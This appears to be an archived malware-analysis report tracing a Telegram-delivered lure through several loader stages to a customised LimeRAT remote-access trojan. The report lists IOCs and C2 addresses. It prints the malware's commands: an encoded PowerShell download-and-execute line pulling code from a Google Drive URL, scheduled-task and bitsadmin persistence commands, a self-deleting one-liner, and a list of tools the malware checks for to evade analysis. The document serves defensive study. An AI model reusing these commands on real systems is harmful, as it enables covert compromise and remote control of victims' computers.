{
	"id": "be2d9808-81f6-4509-b240-49df951ce026",
	"created_at": "2026-04-06T00:17:03.108898Z",
	"updated_at": "2026-04-10T03:21:48.918172Z",
	"deleted_at": null,
	"sha1_hash": "53018c3a9f322d09d671c055d98114529192cd55",
	"title": "LimeRAT Malware Is Used For Targeting Unskilled Threat Actors",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6061393,
	"plain_text": "LimeRAT Malware Is Used For Targeting Unskilled Threat Actors\r\nBy Felipe Tarijon\r\nPublished: 2022-12-13 · Archived: 2026-04-05 20:56:01 UTC\r\nSummary\r\nI received a message on Telegram from an individual as a lure for executing a malicious script that downloads and executes\r\nadditional obfuscated payloads (some of them directly in the memory) that achieve persistence in the victim’s machine. The\r\ndisguise chosen was a supposed collection of files exfiltrated from infected computers via RedLine Stealer, a malware-as-a-service threat very popular among threat actors.\r\nAfter analyzing the final-stage payload, it was possible to identify it as a custom variant of the .NET LimeRAT, an open-source Remote Administration Tool publicly available (on Github) since at least February 2018.\r\n1. Introduction\r\nIn July 2022, an individual (handle @sqcrxti0n) approached me on Telegram by sending a message written in the Russian\r\nlanguage along with an attached compressed file (wallets-sorted.rar):\r\nFigure 1. Telegram Message\r\nMessage:\r\nПривeт.чeкнeшь лoги?oтдeльнo wallets coбрaл.ceгoдняшниe. трaф cвoй лью c гyглa,фб\r\nThe message asks for checking logs — related to some collected “wallets” — inside a compressed file. Additionally, it says\r\nthat the traffic was supposedly obtained from Google and Facebook (if the translation is correct):\r\nFigure 2. Message translation\r\nTaking a look at the file, here are some details about it:\r\nFile name: wallets-sorted.rar\r\nMD5: 15537cbd82c7bfa8314a30ddf3a4a092\r\nSHA256: 68e070e00f9cb3eb6311b29d612b9cf6889ce9d78f353f60aa1334285548df85\r\nAfter extraction, it shows a lot of folders named with “US” + [a unique ID] + [a time stamp] :\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 1 of 20\n\nFigure 3. wallets-sorted.rar structure\r\nEach folder contains a bunch of fake text files, logs, cookies, supposed cryptocurrency wallets, and more:\r\nFigure 4. Fake files\r\nAs an example, the image below shows one of the text files which is related to the RedLine stealer threat:\r\nFigure 5. RedLine Stealer fake log\r\nAs a malware analyst, I once visited a group of Information stealer malware for sale on Telegram for research purposes (I\r\nswear). So, I believe they got my Telegram account from there.\r\nSome of the folders have the same JS file on them (same hash) but with different names:\r\nFigure 6. Folder containing suspicious files\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 2 of 20\n\nAnd the Microsoft Word (.docx) files shown above contain only plain text strings on them:\r\nFigure 7. Fake .docx files contain plain text\r\nFinally, the JS files contain an obfuscated and malicious script downloader which needs to be executed to start the attack.\r\n2. Downloader\r\nNow that we know that the JS file is malicious, let’s start the analysis.\r\nFile details:\r\nFile name: Meta.js\r\nMD5: 202622bcb60388ad2c74981b03763d5d\r\nSHA256: 8ac98edab8a8a2e5b9feeb6c28b2a27b6258d557c0105f087aeeaea995aee2d3\r\nContent:\r\nFigure 8. Malicious JS file content\r\nAfter sanitizing the file, we can see better the malicious code:\r\n1\r\n2\r\n3\r\nnewActiveXObject(\"shElL.APPLICatION\").ShElLeXECutE(\r\n \"cmd.eXe\",\"Cmd /c cmd /C EcHO POwERsHEll -Ec aQBFAFgAKAAoAG4AZQBXAC0ATwBiAEoARQBDAFQAIAAJAAkACQAgACAACQAgACAAIAAJACAAIAAJA\r\n);\r\nOnce double-clicked by the victim, it will run as follows:\r\n1. Gets executed via the command line:\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 3 of 20\n\n\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\%username%\\Downloads\\wallets-sorted\\US[1F92332B4E490152BBA08692ABB682A4] [2022-07-\r\n25T00_13_52.6672057]\\FileGrabber\\Users\\Administrator\\Desktop\\Meta.js”\r\n2. The resulting command will invoke three cmd.exe processes and write a shell command into a “.avi” file. It then executes\r\nanother cmd.exe process that executes that file:\r\n\"C:\\Windows\\System32\\cmd.exe\" Cmd /c cmd /C EcHO POwERsHEll -Ec\r\naQBFAFgAKAAoAG4AZQBXAC0ATwBiAEoARQBDAFQAIAAJAAkACQAgACAACQAgACAAIAAJACAAIAAJACAAIAAJAAkAIAAJACAACQAgACAAIAAgACAAIAAJAG4AZQB0AC4AdwBFAG\r\n\u003e\r\n%LOCALAPPDATA%CU666rZi4UOVMoxz6c01t32uua51pznD9fw1Sc7r73Hc4cPU80Ysaj813h6RPH3M.png:OvP4k5Q2Q6Y1AT9mrj1U6eehRxudHKrIAPC9UxQ83pP4iuoP54G\r\n\u0026 cmD - \u003c\r\n%LOCALAPPDATA%CU666rZi4UOVMoxz6c01t32uua51pznD9fw1Sc7r73Hc4cPU80Ysaj813h6RPH3M.png:OvP4k5Q2Q6Y1AT9mrj1U6eehRxudHKrIAPC9UxQ83pP4iuoP54G\r\n3. The executed “.avi” file contains a command that invokes the powershell.exe process and executes a base64 encoded\r\ncommand\r\nPOwERsHEll -Ec\r\naQBFAFgAKAAoAG4AZQBXAC0ATwBiAEoARQBDAFQAIAAJAAkACQAgACAACQAgACAAIAAJACAAIAAJACAAIAAJAAkAIAAJACAACQAgACAAIAAgACAAIAAJAG4AZQB0AC4AdwBFAG\r\n4. The Base64-decoded command invokes another code downloaded as a string from a Google Drive URL:\r\niEX((neW-ObJECT net.wEbclIeNt).DownlOADSTRiNG('https://drive.google.com/uc?\r\nid=1cqQkRuSXBKprbe_k9t7g7dOO4v7IvWm6\u0026export=download'))\r\nThe downloaded and executed code is a PowerShell script used in the next phase of the attack.\r\n3. Second-Stage Dropper\r\nThe downloaded code is named with the date from the day after I received the message:\r\nFile name: 26.07.2022\r\nMD5: 8db6a8bc3bef287f02dc0b415218c128\r\nSHA256: b58200945412fbbc371dae652b800741f411183c14b50ce99b2d89675b2e9ae6\r\nFile Type: Malicious Powershell script\r\nThe PowerShell script has a big Base64-encoded string that starts with “TVq”, which is transformed to “MZ” after\r\ndecoding. Therefore, the string is a Base64-encoded Microsoft Windows PE file.\r\nFigure 9. Malicious PowerShell script downloaded\r\nAt the end of the script, the string is decoded, copied to a file, and the PE file is then executed:\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 4 of 20\n\nFigure 10. End of the PowerShell script\r\n4. Third-Stage Loader\r\nThe PE is a VB.NET file with the following details:\r\nFile Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5: 8fe7e2573a12bee9cdb2b7fd4939987f\r\nSHA256: d8ecd0a1103834cee76de4c9bd90738ebe05fa46f116ebce591d3ef1ea97418e\r\nObservation: It decrypts and executes a payload directly into memory\r\nThe decompiled code contains some interesting strings in its metadata:\r\nFigure 11. .NET PE decompiled code using the DnSPY tool\r\nThe PE’s resources have a lot of files containing encrypted strings, from P0 to P31. Additionally and curiously, it has some\r\nphotos like below (The United Nations Secretary-General António Guterres and the President of Turkey, Tayyip Erdoğan)\r\nand two photos of a car and a house burning during the fire in Yosemite, California, U.S:\r\nFigure 12. Malware’s resource image #1\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 5 of 20\n\nFigure 13. Malware’s resource image #2\r\nThe image above was originally taken by Justin Sullivan, during the fire in Yosemite, California.\r\nFigure 14. Malware’s resource image #3\r\nThe image above was originally taken by a photographer (David Swanson) from Reuters, also during the fire in Yosemite,\r\nCalifornia.\r\nRegarding its components, the malware has a lot of Forms to probably disguise itself as a legitimate application:\r\nFigure 15. Malware’s components\r\nThe malicious behavior was inserted on Form1. When initialized, it gets the encrypted strings from the resources (P0\r\nthrough P31) and stores them on variables with names mixed with different alphabets:\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 6 of 20\n\nFigure 16. Third-stage - Form 1\r\nThen, all the strings are concatenated into a class property (Line 55):\r\nFigure 17. Third-stage - Form 1 - Concatenated strings from its resources\r\nThe resulting encrypted string has over 2 MB:\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 7 of 20\n\nFigure 18. Encrypted payload\r\nWhen the program is executed, it runs the Form1 class, loading all its properties (including the concatenated encrypted\r\nstrings), and runs a method called NewMethod1 passing a decoded base64 string obtained after calling another method that\r\nreceives the concatenated string and a string that is used to generate the decryption key.\r\nFigure 19. Payload being decrypted and loaded in the memory\r\nThe NewMethod1 simply returns an Assembly object:\r\nFigure 20. NewMethod1\r\nAnd the method that receives the concatenated encrypted string and the key decrypts it using AES256, ECB mode:\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 8 of 20\n\nFigure 21. Decryption function\r\nThe string used to create the key is BE14D8CB and it is hardcoded in the file.\r\nAfter computing the string’s MD5 hash, it gets different parts of its bytes and concatenates them to generate the key:\r\nF3D86A7EFF59314543A5018968E194F3D86A7EFF59314543A5018968E194BC00\r\nThe decrypted payload (a VB.NET PE) is then executed directly into the memory and it has approximately 1.21 MB:\r\nFigure 22. Decrypted payload (Fourth-stage dropper)\r\n5. Fourth-stage Dropper\r\nThe PE is a VB.NET file with the following details:\r\nFile Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5: d0601e4cdf5fcf7e48e82624bfccbbfa\r\nSHA256: 34e16f7c3e743f6d13854d0a8e066bdf64930556c4e6e8fa7c2bb812cc7f29f8\r\nAt this point, the attack starts to get more interesting.\r\nThis payload also has embedded resources like the previous one (Third Stage) but instead of many resources, it has only two\r\nencrypted resources:\r\nFigure 23. Embedded resources\r\nWhen executed, the payload runs its main function:\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 9 of 20\n\nFigure 24. Main function overview\r\nNow, let’s analyze what this code does.\r\n1. Tries to connect to https://www.microsoft.com/ and gets the content returned by the page.\r\n2. Executes the first function named in the Chinese language:\r\nFigure 25. First function\r\nThis function starts three cmd.exe processes that run the md (short for makedir) command, creating three folders:\r\nC:\\ProgramData\\KJeporters\r\nC:\\ProgramData\\Sormerprime\\majority\\Somewhat..\r\nC:\\Users\\Roger\\AppData\\Roaming\\Adobe\\Dontrolling\\Wickremesinghe\\UnconventionalIdentity..\r\nThen, it gets the first encrypted resource and uses the same AES 256 (ECB Mode) decryption mechanism as the Third-stage\r\npayload. However, it uses the following string to generate the key: \"希是人是太族首管的接金她” . Next, the decrypted\r\ncontent is decoded using base64 and decompressed via GZIP. Finally, the resulting data is written in the file below:\r\nC:\\ProgramData\\KJeporters\\notepad.exe\r\nFigure 26. Decrypted resource being written into a file\r\nNote: The analysis of the file above can be found in this document in the Fifth-Stage section.\r\nNext, it starts two cmd.exe processes:\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 10 of 20\n\nFigure 27. Spawning two processes\r\nThe resulting command lines are:\r\n\"cmd\" /c bitsadmin /transfer /download /priority high \"C:\\ProgramData\\KJeporters\\\\notepad.exe\"\r\n\"C:\\ProgramData\\Sormerprime\\majority\\Somewhat..\\\\explorer\"\r\n\"cmd\" /c bitsadmin /transfer /download /priority high \"C:\\ProgramData\\KJeporters\\\\notepad.exe\"\r\n%APPDATA%\\\\\"Adobe\\Dontrolling\\Wickremesinghe\\UnconventionalIdentity..\\\\conhost\"\r\n3. Executes the second function named in the Chinese language.\r\nThis function first tries to connect to https://www.forbes.com/\r\nNext, it creates two folders:\r\nC:\\ProgramData\\Psnflation\r\nC:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Padnesday\\Weather\\Kemonstrated..\r\nThen, it gets the remaining resource and does the same decryption and decompression process as the previous function but it\r\nsaves into a different file without extension:\r\nC:\\ProgramData\\Psnflation\\svchost\r\nNote: The malware above is the same one written in C:\\ProgramData\\KJeporters\\notepad.exe . The only\r\ndifference is the icon used by the file.\r\nNext, it executes the following command line:\r\n\"cmd\" /c bitsadmin /transfer /download /priority high \"C:\\ProgramData\\Psnflation\\\\svchost\"\r\n%APPDATA%\\\\\"Microsoft\\Padnesday\\Weather\\Kemonstrated..\\\\mspaint\"\r\nAnd creates scheduled tasks that are executed every 1 hour:\r\n\"cmd\" /c powershell.exe -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -\r\nnoprofile -Command SCHTASKs /create /f /sc minute /mo 60 /tn \"HKeformerprime\" /tr\r\nC:\\Users\\%username%\\AppData\\Roaming\\Adobe\\Dontrolling\\Wickremesinghe\\UnconventionalIdentity..\\\\conhost\r\n\"cmd\" /c powershell.exe -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -\r\nnoprofile -Command SCHTASKs /create /f /sc minute /mo 60 /tn \"Mtancehimself\" /tr\r\nC:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Padnesday\\Weather\\Kemonstrated..\\\\mspaint\r\n4. Verifies if the program is already in execution by checking if a Mutex is already in use.\r\n5. Executes another function to achieve persistence.\r\nThis function changes the Windows registry by adding the value below into the Shell sub-key as a persistence\r\nmechanism:\r\n Figure 28.\r\nPersistence mechanism #1\r\nNext, it also changes the value below to set a specific folder as the Windows Startup default folder, probably as a fallback in\r\ncase the scheduled tasks don’t work:\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 11 of 20\n\nFigure\r\n29. Persistence mechanism #2\r\nFinally, it executes the command line below that hides the conhost file and deletes itself:\r\ncmd /c attrib +s +h \"\"Adobe\\Dontrolling\\Wickremesinghe\\UnconventionalIdentity..\\\\conhost\"\" \u0026 ping\r\n1.1.1.1 -n 1 -w \u0026 del \"\"C:\\Users\\%userpofile%\\Desktop\\decrypted-payload.bin\"\"\r\nSince the file that executed this payload into the memory is the Third-Stage Loader, it will instead delete that file from the\r\ndisk instead of the “decrypted-payload.bin” shown in the command line above.\r\nAfter that, it tries to execute another method that gets two resources to decrypt and execute them into the memory. However,\r\nthose resources don’t exist in the Third-Stage PE file, raising an exception which is handled by a catch statement that does\r\nnothing.\r\n6. Fifth-Stage Loader\r\nThis malware is the one written at:\r\nC:\\ProgramData\\KJeporters\\notepad.exe\r\nC:\\ProgramData\\Psnflation\\svchost\r\nHere are its details:\r\nFile Type: Microsoft Windows PE, 32-bits, VB.NET\r\nMD5: 10a62030a349651386e0ef66ab7047b9\r\nSHA256: d36f27c55246cdb3f96a386dd67e2ae2503d81d244b42c8fbefd4767832b0df4\r\nThis malware has the same structure as the Third-Stage Dropper, with the same images as resources but the encrypted\r\nstrings were divided into 33 parts (from P0 to P33) instead of 31 like before.\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 12 of 20\n\nFigure 30. Fifth-stage loader resources\r\nSince the Third-Stage malware was already analyzed before, we can focus on the final-stage payload that is decrypted and\r\nloaded into the memory the same way but using a different string for generating the key.\r\n7. Final Payload\r\nMD5: 5eb53fc58ac0d4b819a162c48898cf77\r\nSHA256: 25cd4aba6b2523b66e7c2fc30b2f573dd2e972ebee8da6c21b991bc8dbca8f36\r\nTimestamp: 2022-07-25 04:29:08\r\nFile Type: Microsoft Windows PE, 32-bits, VB.NET\r\nAfter decompiling the file, we can see that it’s obfuscated but this time there are no embedded resources:\r\nFigure 31. Final-stage payload\r\nThen, the code execution happens as follows:\r\n1. Creates a Mutex named “GRUZ_TG_26.07.2022”.\r\n2. Checks a boolean property from a class that is set to false. Because of that, an anti-debugging function is not\r\nexecuted.\r\nThe anti-debugging function works like this though:\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 13 of 20\n\n1. Gets the value of the base64-encoded Registry key System\\CurrentControlSet\\Services\\Disk\\Enum\\\r\nand checks if it contains any of the values below:\r\n“vmware”\r\n“qemu”\r\n“XP”\r\n2. It tries to load the “SbieDll.dll” DLL using the kernel32.dll LoadLibrary function.\r\n3. Checks if the debugger is active/attached by calling System.Debugger.IsLogging() and\r\nSystem.Debugger.IsAttached .\r\n4. Checks if the %windir%\\vboxhook.dll file exists.\r\nIf it’s being debugged, it executes the base64-encoded ( Y21kLmV4ZSAvYyBwaW5nIDAgLW4gMiAmIGRlbCA= )\r\ncommand cmd.exe /c ping 0 -n 2 \u0026 del that deletes itself from the disk and then terminates its execution.\r\nFigure 32. Final-stage payload’s anti-debugging function\r\n3. Starts a thread that keeps trying to connect to “https://twitter.com/”\r\n4. Starts a second thread that tries to connect to “https://www.instagram.com/”\r\n5. Starts a third thread that runs indefinitely the malware’s TCP client. It receives network data and does several\r\noperations with it.\r\nDecrypts the network data using the same mechanism (AES256, ECB Mode, and the string “1q2w3e4r5t” to\r\ngenerate the key) as the other payloads, splits the content by “ |'L'| ”, and saves the data into an array.\r\nThe first element of the array is compared to the strings “!PSend” , “!P” , “!CAP” , “CPL” , “IPL” ,\r\n“IPLM” , and \"!PStart” .\r\n6. Starts a fourth thread that keeps checking if any of the following processes are running:\r\nvmtoolsd.exe\r\nvm3dservice.exe\r\nVMSrvc.exe\r\nVmwareuser.exe\r\nVBoxTray.exe\r\ntaskmgr.exe\r\nprocesshacker.exe\r\nwireshark.exe\r\nprocexp.exe\r\nprocexp64.exe\r\nprocexp64a.exe\r\nAnVir.exe\r\ntcpview.exe\r\nProcessLasso.exe\r\nSvieCtrl.exe\r\nProcessManager.exe\r\napateDNS.exe\r\nnetstat.exe\r\nfilemon.exe\r\nProcess-Explorer-X64.exe\r\nollydbg.exe\r\nhttpdebugger.exe\r\nwindbg.exe\r\n7. Starts a fifth thread that tries to connect to “https://www.microsoft.com/”\r\n8. Starts one last thread that calls a function that checks a value from the Windows Registry\r\nGets the entry “USB” from the Registry Key HKCU\\Software\\INFECTED_MACHINE_UNIQUE_ID\r\nThe unique ID is generated by using the machine’s ProcessorId, BIOS SerialNumber, BaseBoard\r\nSerialNumber, and the VideoController Name values.\r\nAfter debugging the malware’s execution, I noticed that it frequently uses some properties from the class below:\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 14 of 20\n\nFigure 33. Malware settings\r\nAs we already know that the MD5 hash (97db1846570837fce6ff62a408f1c26a) of the string (1q2w3e4r5t) is used to build\r\nthe key (97DB1846570837FCE6FF62A408F1C297DB1846570837FCE6FF62A408F1C26A00), we can decrypt all the\r\nstrings found in the class above:\r\n1. EUYS1q8/PTPEPaGTlq0kYIqqJQcFWo8Dw8zcoMeN5g8=\r\nDecrypted: https://www.facebook.com\r\n2. opEOMI6losc4TmzstGIEAUTNI7b+AZ1yYlWyNrllh/QS68DSHf35FbaIuHluOvO+\r\nDecrypted: https://pastebin.com/raw/W51ty3Bw\r\nContent returned by the URL: 185.66.84.202:3715\r\n3. ACTYEkqawgkzMJ4GTC+DvdRrSXPgcZPEWb90tnFvvlcG0LiwElg/+eh/wvk/XcNeEzfszi1NzJldWc7QauqerCZ+WRIpSw0BxawIVVZnXXcl1zS4c5osg0WnJlW0EaQu\r\nDecrypted: https://drive.google.com/uc?id=1Yf7N9ARxkPqWjSVI756_KfKW3rhL6Def\u0026export=download\r\nContent returned by the URL: GRUZ_29.05.2022.txt\r\nFile content: 94.23.6.32:39431%\r\n4. HfSbrJXsAuyBNCT6wGuJkmY7DrE5X7cfprQvEYs/jo6r3OlQhxafU46MmOLl351ieeDKaBZK5grc79XWusW2QkRRTPU/McTZIO5PMlxCCeQ=\r\nDecrypted: https://web.opendrive.com/api/v1/download/file.json/ODNfMzE3ODgwMDdf?inline=1\r\nContent returned by the URL: 138.201.81.121:39431\r\nYou can find here the CyberChef recipe to decrypt the strings.\r\nNow we know that this malware is probably a backdoor, a botnet, or a RAT.\r\n8. Malware Family Classification\r\nAfter searching for specific IOCs and strings used by the malware stages during the attack, I found some interesting matches\r\non GitHub pointing to the LimeRAT malware:\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 15 of 20\n\nFigure 34. LimeRAT evidence\r\nLimeRAT is developed in Visual Basic .NET and contains many built-in modules such as encrypted communication with its\r\nC2, spreading mechanism via USB drivers, anti-VM/analysis techniques, and many additional plugins such as ransomware\r\ncapability, XMR (Monero) mining, DDoS attacks, Crypto Stealing (by changing the cryptocurrency wallet addresses on the\r\nclipboard), and many more:\r\nFigure 35. LimeRAT open-source project on GitHub\r\nMoreover, looking at LimeRAT’s project, there is a class very similar to the settings we saw in the final-stage malware:\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 16 of 20\n\nFigure 36. LimeRAT settings source-code\r\nThe encryption/decryption process is exactly the same:\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 17 of 20\n\nFigure 37. LimeRAT encryption/decryption code\r\nAs well as the mechanism used for generating the unique ID:\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 18 of 20\n\nFigure 38. LimeRAT UUID generation code\r\nTherefore, the threat actors reused LimeRAT’s publicly available code in different stages of the attack since it’s very\r\nmodularized and easily customizable. They added obfuscation and disguised all payloads, adding legit actions such as\r\nconnecting to Google, Twitter, etc. For the C2 communication, they added other legit hosts like GoogleDrive and OpenDrive\r\nas fallbacks to get the IP:PORT values.\r\nConclusion\r\nThis is an attack that targets people who purchase or are involved with the RedLine Stealer malware-as-a-service threat. The\r\nsocial engineering employed entices the victims with supposed exfiltrated data that will probably be opened by them,\r\nincluding the malicious script, resulting in the execution of the attack and ultimately launching the LimeRAT.\r\nIt was not possible to attribute this attack to any group, so the motivation is unknown. One possibility is that it can be strictly\r\nfinancially motivated, as the malware-as-a-service business is rapidly evolving and attracting inexperienced people that\r\nlikely own cryptocurrency and will not call the authorities in case they are attacked — making them perfect targets.\r\nAdditionally, the victims will not submit the decoy file on services like VirusTotal, resulting in a stealthier and more durable\r\ncampaign.\r\nIOCs (Indicators Of Compromise)\r\nFiles\r\n1. wallets-sorted.rar\r\nMD5: 15537cbd82c7bfa8314a30ddf3a4a092\r\nSHA256: 68e070e00f9cb3eb6311b29d612b9cf6889ce9d78f353f60aa1334285548df85\r\nDescription: Decoy file sent on Telegram\r\n2. Meta.js\r\nMD5: 202622bcb60388ad2c74981b03763d5d\r\nSHA256: 8ac98edab8a8a2e5b9feeb6c28b2a27b6258d557c0105f087aeeaea995aee2d3\r\nDescription: Downloader\r\n3. 26.07.2022\r\nMD5: 8db6a8bc3bef287f02dc0b415218c128\r\nSHA256: b58200945412fbbc371dae652b800741f411183c14b50ce99b2d89675b2e9ae6\r\nDescription: Malicious Powershell script/Second-Stage Dropper\r\n4. Unnamed\r\nMD5: 8fe7e2573a12bee9cdb2b7fd4939987f\r\nSHA256: d8ecd0a1103834cee76de4c9bd90738ebe05fa46f116ebce591d3ef1ea97418e\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 19 of 20\n\nDescription: Third-Stage Loader\r\n5. Unnamed\r\nMD5: d0601e4cdf5fcf7e48e82624bfccbbfa\r\nSHA256: 34e16f7c3e743f6d13854d0a8e066bdf64930556c4e6e8fa7c2bb812cc7f29f8\r\nDescription: Fourth-stage Dropper\r\n6. notepad.exe or svchost\r\nMD5: 10a62030a349651386e0ef66ab7047b9\r\nSHA256: d36f27c55246cdb3f96a386dd67e2ae2503d81d244b42c8fbefd4767832b0df4\r\nDescription: Fifth-Stage Loader\r\n7. Unnamed\r\nMD5: 5eb53fc58ac0d4b819a162c48898cf77\r\nSHA256: 25cd4aba6b2523b66e7c2fc30b2f573dd2e972ebee8da6c21b991bc8dbca8f36\r\nDescription: Final Payload, LimeRAT\r\nURLs\r\nhttps://drive.google.com/uc?id=1cqQkRuSXBKprbe_k9t7g7dOO4v7IvWm6\u0026export=download\r\nhttps://pastebin.com/raw/W51ty3Bw\r\nhttps://drive.google.com/uc?id=1Yf7N9ARxkPqWjSVI756_KfKW3rhL6Def\u0026export=download\r\nhttps://web.opendrive.com/api/v1/download/file.json/ODNfMzE3ODgwMDdf?inline=1\r\nC2 addresses (IP:PORT)\r\n185.66.84.202:3715\r\n94.23.6.32:39431\r\n138.201.81.121:39431\r\nReferences\r\nhttps://malpedia.caad.fkie.fraunhofer.de/details/win.limerat\r\nhttps://yoroi.company/research/limerat-spreads-in-the-wild/\r\nhttps://github.com/NYAN-x-CAT/Lime-RAT/\r\nhttps://www.trellix.com/en-us/about/newsroom/stories/research/targeted-attack-on-government-agencies.html\r\nhttps://github.com/search?q=”Y21kLmV4ZSAvYyBwaW5nIDAgLW4gMiAmIGRlbCA%3D”\u0026type=code\r\nBack to the top\r\nSource: https://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 20 of 20\n\n https://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/  \nFigure 16. Third-stage -Form 1  \nThen, all the strings are concatenated into a class property (Line 55):\nFigure 17. Third-stage -Form 1-Concatenated strings from its resources\nThe resulting encrypted string has over 2 MB: \n  Page 7 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/"
	],
	"report_names": [
		"2022-12-12-limerat-infecting-unskilled-threat-actors"
	],
	"threat_actors": [],
	"ts_created_at": 1775434623,
	"ts_updated_at": 1775791308,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/53018c3a9f322d09d671c055d98114529192cd55.pdf",
		"text": "https://archive.orkl.eu/53018c3a9f322d09d671c055d98114529192cd55.txt",
		"img": "https://archive.orkl.eu/53018c3a9f322d09d671c055d98114529192cd55.jpg"
	}
}